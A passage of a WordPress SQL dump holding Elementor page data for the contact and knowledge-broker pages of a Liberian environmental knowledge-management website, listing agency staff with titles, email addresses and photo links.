href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34831,5089,'_elementor_edit_mode','builder'),(34832,5089,'_elementor_template_type','wp-page'),(34833,5089,'_elementor_version','3.0.16'),(34834,5089,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (34835,5089,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 